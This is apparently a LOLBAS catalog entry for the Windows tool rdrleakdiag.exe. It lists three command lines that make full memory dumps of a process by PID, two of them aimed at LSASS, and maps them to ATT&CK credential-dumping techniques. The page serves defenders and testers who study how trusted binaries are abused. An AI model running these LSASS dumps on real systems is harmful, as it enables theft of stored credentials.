.. /rdrleakdiag.exe

Star

Microsoft Windows resource leak diagnostic tool

• https://twitter.com/0gtweet/status/1299071304805560321?s=21
• https://www.pureid.io/dumping-abusing-windows-credentials-part-1/
• https://github.com/LOLBAS-Project/LOLBAS/issues/84

Dump

1. Dump process by PID and create a dump file (Creates files called minidump_<PID>.dmp and results_<PID>.hlk).

   rdrleakdiag.exe /p 940 /o c:\evil /fullmemdmp /wait 1

   Use case

   Dump process by PID.

   Privileges required

   User

   Operating systems

   Windows

   ATT&CK® technique

   T1003

2. Dump LSASS process by PID and create a dump file (Creates files called minidump_<PID>.dmp and results_<PID>.hlk).

   rdrleakdiag.exe /p 832 /o c:\evil /fullmemdmp /wait 1

   Use case

   Dump LSASS process.

   Privileges required

   Administrator

   Operating systems

   Windows

   ATT&CK® technique

   T1003.001

3. After dumping a process using /wait 1, subsequent dumps must use /snap (Creates files called minidump_<PID>.dmp and results_<PID>.hlk).

   rdrleakdiag.exe /p 832 /o c:\evil /fullmemdmp /snap

   Use case

   Dump LSASS process mutliple times.

   Privileges required

   Administrator

   Operating systems

   Windows

   ATT&CK® technique

   T1003.001